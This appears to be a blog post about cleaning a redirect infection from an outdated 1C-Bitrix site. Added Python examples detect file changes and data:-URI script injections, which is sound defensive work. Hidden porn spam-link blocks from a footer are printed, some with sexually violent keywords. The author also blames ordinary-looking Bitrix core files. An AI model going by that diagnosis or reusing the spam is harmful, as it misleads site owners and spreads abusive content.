Sole proprietor (IP) Dmitry Vladimirovich Chernov
INN 910814572181 / OGRNIP 318911200086332

Symptoms

On one project running the 1C-Bitrix CMS, I ran into the following: a second or two after the site loads, the browser is automatically redirected to casino sites, adult content and the like.

Task

The site was built in 2019 and has not been updated since. The site is infected. It needs to be cleaned.

Initial steps

In November 2024 the license was renewed and the core, the solutions and everything else that could be updated were updated. I raised PHP to 8.3.

The problem went away temporarily.

Yes, errors typical of the move to version 8 appeared (the old code was written for PHP 5): some pages did not accept String variables.

But the problem is not solved yet! A few days later the same thing started again.

Work

It was established that a folder named after the domain appears in /bitrix/html_pages/. In my case it contained about 25000 folders with names like «1a1a7042.shtml», each holding just one file named index@.html

Something creates this directory and fills it with content meant to replace at least the home page.

A content search gave the following result: the directory name «/bitrix/modules/translate/html_pages» had been added to the IGNORE_BX_NAMES constant in the file autoload.php

				
					const IGNORE_BX_NAMES = array(
    ...
	'/bitrix/html_pages',
	...
);
				
			

A second occurrence of the directory name «html_pages» was found in the file /bitrix/modules/main/tools/cron_html_pages.php

				
					<?php
$_SERVER["DOCUMENT_ROOT"] = realpath(__DIR__."/../../../..");
$DOCUMENT_ROOT = $_SERVER["DOCUMENT_ROOT"];

define("NO_KEEP_STATISTIC", true);
define("NOT_CHECK_PERMISSIONS",true);
define("BX_CRONTAB", true);
define('BX_NO_ACCELERATOR_RESET', true);

require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");

@set_time_limit(0);
@ignore_user_abort(true);

$hours = is_array($argv) && count($argv) > 1 && intval($argv[1]) > 0 ? intval($argv[1]) : 24;
$validTime = time() - $hours * 60 * 60;
$bytes = \Bitrix\Main\Composite\Data\FileStorage::deleteRecursive("/", $validTime);
\Bitrix\Main\Composite\Helper::updateQuota(-$bytes);
				
			

Having looked at its contents, it seemed to me that this file is already one of the parts of the infection. I deleted the file, and the site works normally.

Let's look at the file /bitrix/modules/main/include/prolog_before.php

				
					<?php

if (!defined('START_EXEC_PROLOG_BEFORE_1'))
{
	define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
}

$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);

if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}

require_once(__DIR__."/../include.php");

CMain::PrologActions();

if (!defined('START_EXEC_PROLOG_BEFORE_2'))
{
	define("START_EXEC_PROLOG_BEFORE_2", microtime(true));
}

				
			

Judging by the code, this is also part of the infection. Deleting this file brings the site down. Digging further.

Another injection was found in /bitrix/header.php

After the standard code:

				
					<?require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php");?>
				
			

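It was followed by an injection: a run of repeated <script> tags whose src attribute is a data:text/javascript;base64 URI carrying the encoded script.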

				
				
			

Removing this code left the site working. But for some reason Sucuri still sees the injection in the code. Perhaps it is a cache.

2024-11-27

The code appeared in /bitrix/header.php again. And it looks like there is more of it now.

In addition, in the /bitrix/admin/ folder I found newly created files, both with meaningful names such as info.php and with random character strings as names, like bkzjx2r67.php
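Re-injected code in /bitrix/header.php and new files in /bitrix/admin/ are easier to catch by comparing the tree against a snapshot taken right after a cleanup. The following is an added example, not code from the original post: the watched extensions, the skip parameter and the function names are assumptions made for illustration.

```python
import hashlib
import os

# Assumption: file types worth tracking on a PHP site; adjust as needed.
WATCHED = (".php", ".js", ".html", ".htaccess")

def snapshot(root, skip=()):
    """Map every watched file under root (relative, '/'-separated) to its SHA-256.

    skip lists relative directories to leave out, e.g. cache trees that
    legitimately change on every request.
    """
    result = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        # Prune skipped directories in place so os.walk does not descend into them.
        dirnames[:] = [d for d in dirnames
                       if f"{rel_dir}/{d}".removeprefix("./") not in skip]
        for name in filenames:
            if not name.endswith(WATCHED):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
            except OSError:
                continue  # unreadable, or removed between listing and reading
            result[os.path.relpath(path, root).replace(os.sep, "/")] = digest
    return result

def compare(before, after):
    """Return (added, changed, removed) lists of relative paths, each sorted."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    changed = sorted(p for p in before.keys() & after.keys()
                     if before[p] != after[p])
    return added, changed, removed
```

Store the first snapshot outside the web root (for example serialized with json.dump), so that whatever rewrites the site files cannot also rewrite the baseline.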

2024-11-30

Found an injection in the file /local/templates/«your template»/footer.php

Three inserted DIVs with the display:none property

				
					<div style="display: none;">
sexy video download picture <a href="https://zatube.mobi" rel="dofollow" title="zatube.mobi">zatube.mobi</a> indian xvideo porn
hentai good girl <a href="https://www.hentaimangaz.com/" target="_self">hentaimangaz.com</a> female deku hentai
probinsyano july 9 2018 <a href="https://philteleserye.com/" target="_blank">philteleserye.com</a> andrew schimmer wife update today
ana maria cordoba nude <a href="https://www.pornpakistani.com" target="_blank" title="pornpakistani.com">pornpakistani.com</a> kumaraswamy radhika
kancolle collection hentai <a href="https://www.hentaisa.com/" target="_self">hentaisa.com</a> rape mod
</div>

<div style="display: none;">
بزاز جمده <a href="https://www.hardpornovideos.com/" rel="dofollow" title="hardpornovideos.com سكس حمار ينيك بنت">hardpornovideos.com</a> مصراوي سكس
فيلم سكس مايا خليفه <a href="https://maffnet.org/" target="_self" title="maffnet.org المحروسة سكس">maffnet.org</a> فيلم سكس محارم
سكسبنات <a href="https://superamateurtube.com/" target="_self">superamateurtube.com</a> نيك كوري
افلام كورية سكس <a href="https://www.felltube.com/" rel="dofollow" target="_blank" title="felltube.com صور بنات سحاقيات">felltube.com</a> جنس مترجم عربي
chunibyo hentai <a href="https://www.hentaiweb.net/" rel="dofollow" target="_blank">hentaiweb.net</a> kukaku shiba hentai
</div>

<div style="display: none;">
راهبه تتناك <a href="https://hihitube.com/" target="_self" title="hihitube.com">hihitube.com</a> نيك مترجم محارم
sssmovies <a href="https://yourporn.name" target="_blank">yourporn.name</a> south indian aunty fucking
indan six video <a href="https://xxxindianporn.org/" rel="dofollow" title="xxxindianporn.org">xxxindianporn.org</a> xhamaster hd
xxxin <a href="https://tubeporncity.info" rel="dofollow" title="tubeporncity.info">tubeporncity.info</a> tub 99.com
bangladeshxvideo <a href="https://gotporn.mobi" title="gotporn.mobi">gotporn.mobi</a> forced mom sex
</div>
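Both kinds of injection described above, the data: URI script tags in header.php and the hidden link blocks in footer.php, can be checked for locally instead of relying on an external scanner's possibly cached result. The following is an added example, not code from the original post: the function and class names are illustrative, the sample input is constructed with placeholder hosts, and the checks are heuristics for these two patterns only.

```python
import base64
import re
from html.parser import HTMLParser

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
def decode_data_uri(src):
    """Return the URLs referenced inside a data: URI (base64 bodies are decoded first)."""
    header, _, body = src.partition(",")
    if ";base64" in header:
        try:
            body = base64.b64decode(body).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError (bad padding)
            return []
    return URL_RE.findall(body)

class InjectionScanner(HTMLParser):
    """Records data:-URI <script> tags and links placed inside display:none <div>s."""
    def __init__(self):
        super().__init__()
        self.findings = []          # (kind, detail) tuples in document order
        self.hidden_depth = 0       # > 0 while inside a hidden <div>
    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "script" and (attr.get("src") or "").startswith("data:"):
            self.findings.append(("data-uri-script", decode_data_uri(attr["src"])))
        if tag == "div":
            style = (attr.get("style") or "").replace(" ", "").lower()
            if self.hidden_depth or "display:none" in style:
                self.hidden_depth += 1      # nested divs stay hidden too
        if tag == "a" and self.hidden_depth and attr.get("href"):
            self.findings.append(("hidden-link", attr["href"]))
    def handle_endtag(self, tag):
        if tag == "div" and self.hidden_depth:
            self.hidden_depth -= 1

def scan(text):
    """Scan one template's source text and return its findings."""
    parser = InjectionScanner()
    parser.feed(text)
    parser.close()
    return parser.findings

# Constructed sample: placeholder hosts, not the payload or links from the page.
PAYLOAD_B64 = base64.b64encode(b"var R_PATH = 'https://tracker.example/T1';").decode()
SAMPLE = (
    '<?require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php");?>\n'
    f'<script src="data:text/javascript;base64,{PAYLOAD_B64}"></script>\n'
    '<div style="display: none;">kw <a href="https://spam.example/">spam.example</a></div>\n'
)
```

Run scan() over the contents of every template file; the URLs returned for a data-uri-script finding show where the decoded loader points without executing it.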
				
			
